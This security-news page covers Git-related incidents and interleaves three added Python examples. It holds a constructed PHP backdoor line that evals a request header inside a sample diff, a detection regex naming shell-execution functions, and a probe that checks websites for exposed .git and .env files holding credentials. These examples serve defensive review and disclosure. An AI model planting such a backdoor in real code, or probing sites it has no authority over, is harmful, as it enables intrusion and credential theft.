Security News

PHP's Git Server Hacked to Insert Secret Backdoor Into Its Source Code
2021-03-29 03:51

In yet another instance of a software supply chain attack, unidentified actors hacked the official Git server of the PHP programming language and pushed unauthorized updates that inserted a secret backdoor into its source code. The changes, committed under the message "Fix Typo" in an attempt to slip through review as a typographical correction, added provisions for executing arbitrary PHP code.
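A server-side check a maintainer would want after an incident like this, given here as an added example (not code from the PHP project or from the reporting): scan the added lines of each pushed diff for code-execution sinks and raise a finding when the commit message claims a cosmetic change. The commit message, file name and diff below are constructed for the example and are not the actual commit.

```python
"""Flag commits whose message promises a trivial change but whose diff adds a
code-execution sink.  Added example; the sample diff is constructed and is not
the real commit from the PHP incident."""
import re

# Commit-message patterns that normally accompany cosmetic changes.
TRIVIAL_MESSAGE = re.compile(
    r"^\s*(fix(es|ed)?\s+typo|typo|whitespace|comment|spelling)", re.I)

# Direct execution primitives in PHP source, plus the Zend engine's own
# eval entry point for C-level sources.  Kept narrow on purpose.
CODE_EXEC_SINKS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open"
    r"|create_function|zend_eval_stringl?)\s*\("
    r"|`[^`]*\$[^`]*`"          # backtick shell operator with interpolated variable
    r"|(?<![\w$])\$\w+\s*\("    # variable function call: $fn(...)
    , re.I)

def added_lines(diff_text):
    """Yield (path, new_line_no, text) for every '+' line in a unified diff."""
    path, line_no = None, 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            path = raw[4:].strip()
            path = path[2:] if path.startswith("b/") else path
        elif raw.startswith("@@"):
            m = re.match(r"@@ -\d+(?:,\d+)? \+(\d+)", raw)
            line_no = int(m.group(1)) - 1 if m else 0
        elif raw.startswith("+") and not raw.startswith("+++"):
            line_no += 1
            yield path, line_no, raw[1:]
        elif raw.startswith("-"):
            continue                      # removed line: no new-file number
        elif raw.startswith(" ") or raw == "":
            line_no += 1                  # unchanged context line

def review_commit(message, diff_text):
    """Return [(path, line_no, code)] for sinks added under a 'trivial' message."""
    findings = []
    if not TRIVIAL_MESSAGE.search(message):
        return findings
    for path, line_no, text in added_lines(diff_text):
        stripped = text.strip()
        if stripped.startswith(("//", "#", "*", "/*")):
            continue                      # comment-only line, not executable
        if CODE_EXEC_SINKS.search(text):
            findings.append((path, line_no, stripped))
    return findings

# Constructed sample: a genuine spelling fix bundled with an eval() on a
# request header.  Not the real PHP commit.
SAMPLE_MESSAGE = "Fix typo"
SAMPLE_DIFF = r"""diff --git a/src/Util/Text.php b/src/Util/Text.php
--- a/src/Util/Text.php
+++ b/src/Util/Text.php
@@ -10,7 +10,9 @@ class Text
     /**
-     * Normalise whitespace in the suplied string.
+     * Normalise whitespace in the supplied string.
      */
     public static function normalise($s)
     {
+        // constructed example of a sink hidden in a "typo fix"
+        if (isset($_SERVER['HTTP_X_DEBUG'])) { eval($_SERVER['HTTP_X_DEBUG']); }
         return preg_replace('/\s+/', ' ', $s);
     }
"""

if __name__ == "__main__":
    for path, line_no, code in review_commit(SAMPLE_MESSAGE, SAMPLE_DIFF):
        print(f"{path}:{line_no}: execution sink added under trivial message: {code}")
```

Wire `review_commit` into a pre-receive or update hook that feeds it `git log -1 --format=%B` and `git diff <old>..<new>` for every pushed commit, and treat any finding as a reason to hold the push for human review rather than to block it outright; the sink list is deliberately short and will not catch every obfuscation, so it complements, and does not replace, signed commits and mandatory review.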

Researchers hacked Indian govt sites via exposed git and env files
2021-03-12 16:46

Researchers have now disclosed more information on how they were able to breach multiple websites of the Indian government. Last month, researchers from the Sakura Samurai hacking group had partially disclosed that they had breached systems belonging to the Indian government after finding a large number of critical vulnerabilities.

Passwords begone: GitHub will ban them next year for authenticating Git operations
2020-12-17 08:29

Microsoft's GitHub plans to stop accepting account passwords as a way to authenticate Git operations, starting August 13, 2021, following a test period without passwords two weeks earlier. From that date the requirement will cover all Git-related command line interactions, desktop apps that use Git, and any software or service that accesses Git repositories on GitHub with a password.

Git LFS vulnerability allows attackers to compromise targets’ Windows systems (CVE-2020-27955)
2020-11-05 11:14

A critical vulnerability in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, allows attackers to achieve remote code execution if a Windows-using victim is tricked into cloning the attacker's malicious repository with a vulnerable version of the tool, security researcher Dawid Golunski has discovered. Golunski found that Git LFS does not specify a full path to the git binary when it spawns a new git process through an exec call; on Windows a bare program name is resolved by searching the current directory before PATH, so a `git` executable planted in the cloned repository is run instead of the real one.
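The same resolution mistake, shown in Python as an added example rather than Git LFS's own Go code: the naive lookup, which mimics the Windows search order, lets a binary planted in the cloned repository win, while the hardened resolver accepts only absolute PATH entries that lie outside the repository. The directory names and the stand-in `git` scripts are constructed here so the block runs offline on Linux.

```python
"""Resolve a helper binary only from trusted, absolute PATH entries, never from
the current directory or from inside the repository being operated on.  Added
example in Python of the lookup mistake described above; not Git LFS's code."""
import os
import shutil
import tempfile

def naive_resolve(name, search_path, cwd):
    """Windows-style lookup: '.' and other relative PATH entries are resolved
    against the current working directory, which after `git clone` is the
    attacker's repository."""
    for entry in search_path.split(os.pathsep):
        candidate = os.path.join(cwd, entry or ".", name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return os.path.abspath(candidate)
    return None

def resolve_trusted_binary(name, search_path, repo_root, exts=("",)):
    """Return an absolute path to `name`, or None if no trusted copy exists.

    Rejects every unsafe route: empty or '.' PATH entries, relative entries,
    and any entry inside the repository working tree.  `exts` lets a Windows
    caller pass PATHEXT-style suffixes such as (".exe", ".bat", ".cmd")."""
    repo_root = os.path.realpath(repo_root)
    for entry in search_path.split(os.pathsep):
        if entry in ("", ".") or not os.path.isabs(entry):
            continue                               # would resolve relative to cwd
        entry = os.path.realpath(entry)
        if os.path.commonpath([entry, repo_root]) == repo_root:
            continue                               # attacker-controlled directory
        for ext in exts:
            candidate = os.path.join(entry, name + ext)
            if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
                return candidate
    return None

def demo():
    """Constructed scenario: a cloned repo carrying a planted `git`, and a
    trusted bin dir (standing in for the real install location).  Returns the
    path each strategy would execute."""
    base = tempfile.mkdtemp(prefix="lfs-demo-")
    repo = os.path.join(base, "clone")
    trusted = os.path.join(base, "trusted_bin")
    for d in (repo, trusted):
        os.makedirs(d)
        script = os.path.join(d, "git")
        with open(script, "w") as f:
            f.write("#!/bin/sh\necho %s\n" % os.path.basename(d))
        os.chmod(script, 0o755)
    # Windows search order: current directory first, then the real PATH.
    search_path = os.pathsep.join([".", trusted])
    unsafe = naive_resolve("git", search_path, cwd=repo)
    safe = resolve_trusted_binary("git", search_path, repo_root=repo)
    shutil.rmtree(base)
    return unsafe, safe

if __name__ == "__main__":
    unsafe, safe = demo()
    print("naive lookup would run:   ", unsafe)
    print("hardened lookup would run:", safe)
```

On a real system the caller would pass `os.environ["PATH"]` and the top of the working tree (for example the output of `git rev-parse --show-toplevel`); whatever the helper returns is then handed to `subprocess.run` as an absolute path, so the process launcher performs no search of its own.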

ProtonMail-run website boasting 'complete guide' to GDPR left credential-baring .git repo exposed online
2020-04-29 09:00

An EU-sponsored GDPR advice website run by Proton Technologies exposed its .git directory, letting anyone clone the site's repository and extract a MySQL database username and password from it. "The irony of an EU-funded website about GDPR having security issues isn't lost on us," mused the security consultancy.

GDPR Compliance Site Leaks Git Data, Passwords
2020-04-27 21:15

The website, GDPR.EU, is an advice site for organizations that are struggling to comply with the General Data Protection Regulation, which the EU imposed in 2018. "However, the irony of an EU-funded web site about GDPR having security issues isn't lost on us."
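Both GDPR.EU items above and the Indian government case earlier on this page come down to the same exposure, so one check serves all of them. The probe below is an added example, not code from any of the reporting: it tests whether a site serves a readable `.git/HEAD`, parses `.git/config` for remote URLs that embed credentials, and checks `/.env` for secret-looking variables. The hostnames and HTTP responses are constructed so the block runs offline; `http_fetch` is what you would pass for a live target.

```python
"""Detect an exposed .git directory or .env file on a web root and report what
leaks.  Added example; the hostnames and response bodies are constructed."""
import configparser
import re
import urllib.request

# A real .git/HEAD is one line: a symbolic ref or a raw object id (SHA-1 or SHA-256).
HEAD_RE = re.compile(r"^(ref: refs/heads/\S+|[0-9a-f]{40}|[0-9a-f]{64})$")
# Remote URL with an embedded user:password (or user:token) pair.
CRED_URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://(?P<user>[^:@/]+):(?P<pw>[^@/]+)@")
# Variable names that usually hold secrets in a dotenv file.
SECRET_KEY_RE = re.compile(
    r"^(?:export\s+)?([A-Z0-9_]*(?:PASS(?:WORD)?|SECRET|TOKEN|API_KEY|PRIVATE_KEY)"
    r"[A-Z0-9_]*)\s*=\s*(\S+)", re.M)

def http_fetch(url, timeout=5):
    """Live fetcher: body as text on HTTP 200, None on any error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.read(65536).decode("utf-8", "replace") if r.status == 200 else None
    except Exception:
        return None

def looks_like_git_head(body):
    """Reject soft-404 HTML and redirect pages; accept only a plausible HEAD."""
    return body is not None and HEAD_RE.match(body.strip()) is not None

def credentials_in_git_config(body):
    """Return [(section, username)] for remotes whose URL embeds a secret.
    The secret itself is deliberately not returned."""
    # git indents keys with a tab, which configparser would read as a
    # continuation line, so flatten indentation first.
    flat = "\n".join(line.strip() for line in body.splitlines())
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(flat)
    found = []
    for section in cp.sections():
        url = cp.get(section, "url", fallback=None)
        m = CRED_URL_RE.match(url) if url else None
        if m:
            found.append((section, m.group("user")))
    return found

def secret_keys_in_dotenv(body):
    """Return the names (never the values) of non-empty secret-looking variables."""
    return [m.group(1) for m in SECRET_KEY_RE.finditer(body)
            if m.group(2) not in ('""', "''")]

def probe(base_url, fetch=http_fetch):
    """Probe one site; `fetch` is injectable so the check can run offline."""
    base = base_url.rstrip("/")
    report = {"git_exposed": False, "git_credentials": [], "env_secrets": []}
    head = fetch(base + "/.git/HEAD")
    if looks_like_git_head(head):
        report["git_exposed"] = True
        cfg = fetch(base + "/.git/config")
        if cfg:
            report["git_credentials"] = credentials_in_git_config(cfg)
    env = fetch(base + "/.env")
    if env:
        report["env_secrets"] = secret_keys_in_dotenv(env)
    return report

# Constructed responses: one leaky site, one that answers 404 HTML for everything.
FAKE_SITE = {
    "https://leaky.invalid/.git/HEAD": "ref: refs/heads/master\n",
    "https://leaky.invalid/.git/config": (
        "[core]\n\trepositoryformatversion = 0\n\tbare = false\n"
        '[remote "origin"]\n'
        "\turl = https://deploy:s3cret-token@git.example.invalid/site.git\n"
        "\tfetch = +refs/heads/*:refs/remotes/origin/*\n"),
    "https://leaky.invalid/.env": (
        "APP_ENV=production\nDB_USERNAME=gdpr\nDB_PASSWORD=hunter2\nMAIL_PORT=587\n"),
    "https://hardened.invalid/.git/HEAD": "<!doctype html><title>404 Not Found</title>",
}

def fake_fetch(url):
    """Offline stand-in for http_fetch, backed by the constructed responses."""
    return FAKE_SITE.get(url)

if __name__ == "__main__":
    for site in ("https://leaky.invalid", "https://hardened.invalid"):
        print(site, probe(site, fetch=fake_fetch))
```

Only usernames and variable names are reported, which is enough to prove impact in a disclosure without copying the secrets themselves into a report. On the defending side, the fix is to deny the paths at the web server (for nginx, `location ~ /\.(git|env) { deny all; return 404; }`) or, better, to deploy a build artifact rather than a checked-out working tree, and to rotate any credential that was ever committed.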

How to install and use git-secret
2020-01-02 19:18

Learn how to gain more security in your git repository with the help of the git-secret tool. If you use Git for much of your development needs, you should know there's a dirty little secret to be found.

Git your patches here! GitHub offers to brew automatic pull requests loaded with vuln fixes
2019-05-30 07:12

Your repo's dependencies need updating to close a hole? We're way ahead of you, pal. GitHub can now automagically offer security patches for projects' third-party dependencies.…

Hundreds of Git Repositories Held for Ransom
2019-05-06 08:20

Cybercriminals have been wiping GitHub, GitLab and Bitbucket repositories and asking their owners to pay a ransom to recover the data. The impacted Git service providers believe the attackers have...

Mystery Git ransomware appears to blank commits, demands Bitcoin to rescue code
2019-05-03 19:00

Sudden flurry of forum posts leaves a few clues

Programmers say they've been hit by ransomware that seemingly wipes their Git repositories' commits and replaces them with a ransom note demanding Bitcoin.…